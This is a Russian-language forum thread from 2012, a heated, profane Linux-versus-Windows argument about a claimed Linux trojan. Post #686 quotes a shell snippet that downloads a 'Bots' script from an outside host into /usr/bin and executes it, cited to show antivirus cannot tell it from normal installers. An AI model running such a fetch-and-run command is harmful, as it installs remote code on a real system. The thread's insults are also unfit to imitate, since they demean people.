Объявление

Односложные и бессмысленные темы, не несущие полезную нагрузку или не содержащие в себе вопрос, будут удаляться!

#676 06-10-12 23:16:38

ikkunan salvataja
Участник
Здесь с 30-01-10
LinuxFirefox 10.0

Re: Обнаружен первый в истории троянец для Linux.

selenscy пишет:

какой то "тупой вендузятнеГ"  вас здесь троллит

Какой то тупой вендузятнеГ, не будем показывать пальцем какой именно, тут вовсю показывает свою дурь.

Yesterday it worked.
Today it is not working.
Windows is like that.

#677 06-10-12 23:17:09

Apollo 11
Тролль № 1 (по рейтингу Svart'а Testare)
Здесь с 01-06-10
Сайт
LinuxFirefox 15.0

selenscy пишет:

Скажи спасибо политрукам и Аполлоше. х*й вы от меня больше, чем косвенного дождётесь

Железно отмазался lol И почему я не удивляюсь? У тебя косвенное спрашивали уже давно. Да только никаких ответов так и не получили.

selenscy пишет:

Хотя некоторым уже всё показано

"Хорошим политрукам" показано? А "плохим политрукам" показывать отказываешься? lol

selenscy пишет:

На деле ничего там и нет сложного, обыкновенный скрипт.

Да, мы видели альфа-версии lol С запуском по cron'у lol

selenscy пишет:

Хуле, какой то "тупой вендузятнеГ"  вас здесь троллит

Та ни боже мой, дружок! Ты не нас троллишь. Ты троллишь исключительно самого себя. Как ты думаешь, почитав всю эту эпопею со "злобным вирусом", у кого-нибудь ещё останутся сомнения, почему твои бубунты постоянно падают? lol

Добавлено спустя 02 мин 49 с:

selenscy пишет:

Ну и тебя, во главе стада мудаков, с лозунгами про моск и "Антивирус нинужын"

Уж не намекаешь ли ты, что твой "злобный вирус" поразил мой Linux в виртуалке? lol Может быть, ты тогда и закинешь мне мои логи, коли доступ имеешь? lol

"Я как переезжал с ХР на Вин 7? Просто скопировал папку Program Files, а потом по мере необходимости возвращал софт оттуда. 100% уверенность, что не будет глюков." © Sergey2408
"Я хочу обвешать свой Winamp плагинами, но не хочу портить основную сборку.... Поэтому я просто ставлю ещё одну копию в папку /Program Files (x86)/Winamp1. Версия проги одна и та же" © Sergey2408

#678 06-10-12 23:22:45

selenscy
Участник
Здесь с 28-11-10
UbuntuFirefox 15.0

Apollo 11 пишет:

Да, мы видели альфа-версии lol С запуском по cron'у lol

И чо?  smile  Важен результат!

Кстати, как я говорил, всё так же, как и в gnomelook может обновляться и апгрейдить модули, соответственно пароли явки, ну и алгоритм  wink

База сама по себе сплошной скрипт (с) AleksK

При том, что свежие очевидно работают лучше и исправляют некоторые глюки. А в линуксе они (глюки!!!)ещё и становятся нормальными (c) Журнашлюшка smile

#679 06-10-12 23:24:45

Linups_Troolvalds
С нами Баг!
Здесь с 06-10-09
LinuxChrome 22.0

Apollo 11, я поражаюсь вашему терпению, оно превосходит даже мое.  smile

.:``́3̶E̶P̶O̶W̶h̶`́`:.

#680 06-10-12 23:26:11

selenscy
Участник
Здесь с 28-11-10
UbuntuFirefox 15.0

ikkunan salvataja пишет:

Какой то тупой вендузятнеГ, не будем показывать пальцем какой именно, тут вовсю показывает свою дурь.

А я и не спорю!  Однако поделиё тупо шлёт логи  wink  Сделай так же! Умный пенгванутый!  lol

При том, что свежие очевидно работают лучше и исправляют некоторые глюки. А в линуксе они (глюки!!!)ещё и становятся нормальными (c) Журнашлюшка smile

#681 06-10-12 23:27:39

Apollo 11
Здесь с 01-06-10
Сайт
LinuxFirefox 15.0

selenscy пишет:

И чо?

Да то, что я сам тебе описáл гораздо более простые способы, без повышения привилегий, да у тебя так и не хватило ума ими воспользоваться. Только и хватает ума на то, чтобы вопить про антивирус lol Повторяю для особо одарённых: от зловреда, выложенного на Gnome-Look, антивирус не спасёт.

selenscy пишет:

Важен результат!

...которого нет. Зато есть жуткие истории про "политруков", окопавшихся на СЛОРе, с целью отмщения "проклятым закапывателям" lol

Добавлено спустя 02 мин 24 с:

Linups_Troolvalds пишет:

Apollo 11, я поражаюсь вашему терпению, оно превосходит даже мое.

Да это чЮдо мне по два часа жизни прибавляет, когда я с ним общаюсь. Благодаря живительному и очистительному после рабочей недели хохоту. Я благодарить его должен. Он же мне сил придаёт на целую неделю трудовых будней smile

"Я как переезжал с ХР на Вин 7? Просто скопировал папку Program Files, а потом по мере необходимости возвращал софт оттуда. 100% уверенность, что не будет глюков." © Sergey2408
"Я хочу обвешать свой Winamp плагинами, но не хочу портить основную сборку.... Поэтому я просто ставлю ещё одну копию в папку /Program Files (x86)/Winamp1. Версия проги одна и та же" © Sergey2408

#682 06-10-12 23:31:41

selenscy
Участник
Здесь с 28-11-10
UbuntuFirefox 15.0

Apollo 11 пишет:

Только и хватает ума на то, чтобы вопить про антивирус lol Повторяю для особо одарённых: от зловреда, выложенного на Gnome-Look, антивирус не спасёт.

Apollo 11 пишет:

X-Antivirus: avast! (VPS 120930-0, 30.09.2012), Outbound message X-Antivirus-Status: Clean

Это реальный результат, но тебе, идиоту, этого никогда не понять, илитному списиалисту. Потому как антивирус стуканул даже на примитивную пакость. Да так что даже вписал в мыло, что будет отражено в его журнале, кто когда и зачем посылал.

Отредактировано selenscy (06-10-12 23:35:27)

#683 06-10-12 23:31:46

Okkamas Buddy
Участник
Здесь с 22-05-12
Windows 8Chrome 22.0

Apollo 11, ты всегда так много и обстоятельно пишешь, что создаётся ощущение, будто ты владеешь способом печати на клавиатуре более быстрым, чем просто слепой метод. Нет, серьёзно smile

Помнится, я написал свои впечатления о 8-ке в топике про отключение Метро, так абзацев было меньше, чем в среднем твои стандартные посты (ты вроде говорил, что заходишь сюда краем галаза), а времени рабочего я убил минут 40, если не больше.

Случайности не случайны.

#684 06-10-12 23:33:25

Linups_Troolvalds
С нами Баг!
Здесь с 06-10-09
LinuxChrome 22.0

Apollo 11 пишет:

Он же мне сил придаёт на целую неделю трудовых будней

Ну да, мне оно тоже доставляет.  big_smile

Добавлено спустя 03 мин 51 с:

Okkamas Buddy пишет:

ты всегда так много и обстоятельно пишешь, что создаётся ощущение, будто ты владеешь способом печати на клавиатуре более быстрым, чем просто слепой метод

Линуксоиды обычно вообще хорошо владеют клавиатурой. Я свою клаву, на которой стерлись почти все буквы, давно выкинул. Печатаю со скоростью среднестатистического пользователя ПК только на тугих защищенных промышленных силиконовых клавиатурах, на удобной офисной скорость примерно совпадает со скоростью речи, и это нормально.

#685 06-10-12 23:37:33

Rorschach
Еще один Великий Человек
Здесь с 04-05-10
Windows 7Chrome 22.0

Linups_Troolvalds, Apollo 11, А кому он тут не доставляет. Его перлами весь мой отдел зачитывается. Говорят, можно книжку написать - "Письма из Кащенко"

#686 06-10-12 23:38:26

Apollo 11
Здесь с 01-06-10
Сайт
LinuxFirefox 15.0

selenscy пишет:

Это реальный результат, но тебе, идиоту, этого никогда не понять, илитному списиалисту. Потому как антивирус стуканул даже на примитивную пакость.

Ага, ага lol Это тот самый Avast!, который реальную заразу пропускает, а нормальный софт лочит? lol Вот тебе ответ от Nebulos'ы:

Nebulosa пишет:

cd /usr/bin/
wget 05748.t35.com/Bots/index.php
wget 05748.t35.com/Bots/run.bash
sleep 4
rm index.php
chmod 755 run.bash
command -p /usr/bin/run.bash

какую из набора команд нужно запрещать?.. Похожим образом, например, устанавливается Flash или Swiftfox

Вот и ответь на его вопрос.

Okkamas Buddy пишет:

Apollo 11, ты всегда так много и обстоятельно пишешь, что создаётся ощущение, будто ты владеешь способом печати на клавиатуре более быстрым, чем просто слепой метод. Нет, серьёзно

Ну, в общем-то, печатаю я быстро, да. Практика, знаете ли, большая.

#687 06-10-12 23:39:03

Linups_Troolvalds
С нами Баг!
Здесь с 06-10-09
LinuxChrome 22.0

Rorschach пишет:

кому он тут не доставляет.

Только аккуратнее, а то спугнем, а мудила ряженый так не доставляет, как этот.

#688 06-10-12 23:43:26

Rorschach
Еще один Великий Человек
Здесь с 04-05-10
Windows 7Chrome 22.0

Linups_Troolvalds, А что вспугивать-то? Дядьке реально 50 лет, а тут какие то малолетки его опускают. Нипанимает он этого, вот и вливается аки фанта.

#689 06-10-12 23:43:50

Okkamas Buddy
Участник
Здесь с 22-05-12
Windows 8Chrome 22.0

Linups_Troolvalds пишет:

Линуксоиды обычно вообще хорошо владеют клавиатурой.

Разве, это не ты учил меня не делить людей на линуксоидов и виндузятников?! Не тебе ли я доверился и перестал делить людей по признаку используемой ОС, а стал относиться к интернет-собеседникам исключительно по степени их адекватности, дружелюбности и количеству грамматических ошибок на единицу текста?! Как же так? Что случилось с тобой? smile

Случайности не случайны.

#690 06-10-12 23:44:35

selenscy
Участник
Здесь с 28-11-10
UbuntuFirefox 15.0

Apollo 11 пишет:

который реальную заразу пропускает,

От ано чо! Оказывается реальная зараза то есть!  cool Молодцы, хуле! Допизделись!  lol  lol  lol

Дык шлите тогда как в поделиё багрепорты!  lol  lol  lol

#691 06-10-12 23:48:00

Apollo 11
Здесь с 01-06-10
Сайт
LinuxFirefox 15.0

selenscy пишет:

От ано чо! Оказывается реальная зараза то есть! Молодцы, хуле! Допизделись!

А ты думаешь, мы никогда Виндой не пользовались? Или обзоры антивирусов не читали?
К тому же, не виляй филейными частями! По поводу существования заразы под Linux я же и говорил в первых же постах этой темы. И тебе не раз повторял и давал ссылки на свои посты. Но у тебя, видимо, что-то не так с понималкой, раз ты продолжаешь гундосить одно и то же. Или же тупо пытаешься обезболить свой баттхёрт.

#692 06-10-12 23:48:03

selenscy
Участник
Здесь с 28-11-10
UbuntuFirefox 15.0

Okkamas Buddy пишет:

Разве, это не ты учил меня не делить людей на линуксоидов и виндузятников?! Не тебе ли я доверился и перестал делить людей по признаку используемой ОС, а стал относиться к интернет-собеседникам исключительно по степени их адекватности, дружелюбности и количеству грамматических ошибок на единицу текста?! Как же так? Что случилось с тобой? smile

Да лан! Ну ёбнули пенгванутых по окаянному отростку, они уже всю "политкоректность" позабыли нах  smile Хы-хы!

#693 06-10-12 23:48:05

Rorschach
Еще один Великий Человек
Здесь с 04-05-10
Windows 7Chrome 22.0

selenscy пишет:

От ано чо! Оказывается реальная зараза то есть!

Ага, есть, только в винде. Даже MSE лучше заразу фильтрует, при том на порядки.

#694 06-10-12 23:50:02

Linups_Troolvalds
С нами Баг!
Здесь с 06-10-09
LinuxChrome 22.0

Okkamas Buddy пишет:

Разве, это не ты учил меня не делить людей на линуксоидов и виндузятников?!

Да, я прав и неправ одновременно. Делить не хочу. Но статистически пользователи линукса быстрее печатают на клавиатуре.

#695 06-10-12 23:50:05

selenscy
Участник
Здесь с 28-11-10
UbuntuFirefox 15.0

Apollo 11 пишет:

А ты думаешь, мы никогда Виндой не пользовались? Или обзоры антивирусов не читали?
К тому же, не виляй филейными частями! По поводу существования заразы под Linux я же и говорил в первых же постах этой темы. И тебе не раз повторял и давал ссылки на свои посты. Но у тебя, видимо, что-то не так с понималкой, раз ты продолжаешь гундосить одно и то же. Или же тупо пытаешься обезболить свой баттхёрт.

Да до пизды мне, что ты там трямкал. Тут твои собратья по несчастью, вон совсем другого мнения  smile

#696 06-10-12 23:50:12

Apollo 11
Здесь с 01-06-10
Сайт
LinuxFirefox 15.0

selenscy пишет:

Ну ёбнули пенгванутых по окаянному отростку, они уже всю "политкоректность" позабыли нах

Повторяй это почаще. Глядишь, и переживёшь этот свой очередной феерический слив с этой мантрой, валидолом и набором свечей от баттхёрта. А я спать пошёл. Смотри, не поломай меня полностью этой ночью lol

#697 06-10-12 23:53:24

selenscy
Участник
Здесь с 28-11-10
UbuntuFirefox 15.0

Apollo 11 пишет:

Повторяй это почаще. Глядишь, и переживёшь этот свой очередной феерический слив с этой мантрой, валидолом и набором свечей от баттхёрта. А я спать пошёл. Смотри, не поломай меня полностью этой ночью lol

Спи, спи! Илитный списиалист  smile Спиртиком только протри системник с клавой  tongue

#698 06-10-12 23:56:48

Rorschach
Еще один Великий Человек
Здесь с 04-05-10
Windows 7Chrome 22.0

Apollo 11 пишет:

свечей от баттхёрта

Там уже не то, что свечами, а группой проктологов не обойдешься. Госпитализация нужна уже.

#699 07-10-12 00:01:39

Linups_Troolvalds
С нами Баг!
Здесь с 06-10-09
LinuxChrome 22.0

Rorschach пишет:

Там уже не то, что свечами, а группой проктологов не обойдешься.

Я думаю, тут случай, когда эвтаназия показана без каких-либо вариантов.

#700 07-10-12 00:02:06

Okkamas Buddy
Участник
Здесь с 22-05-12
Windows 8Chrome 22.0

Linups_Troolvalds пишет:

Но статистически пользователи линукса быстрее печатают на клавиатуре.

"Линуксоиды в среднем печатают быстрее", "линуксоиды в среднем умнее", "у линуксоидов в среднем длиннее на 15 см". Ох, уж эти линкус-журналы. Linux Format, Full Circle, Ubuntu User... Если бы не они, вернулся б на винду гораздо раньше. smile

Случайности не случайны.

Сейчас в этой теме пользователей: 0, гостей: 1
[Bot] ClaudeBot

Подвал форума

Под управлением FluxBB
Модифицировал Visman

[ Сгенерировано за 0.015 сек, 8 запросов выполнено - Использовано памяти: 1.81 Мбайт (Пик: 1.89 Мбайт) ]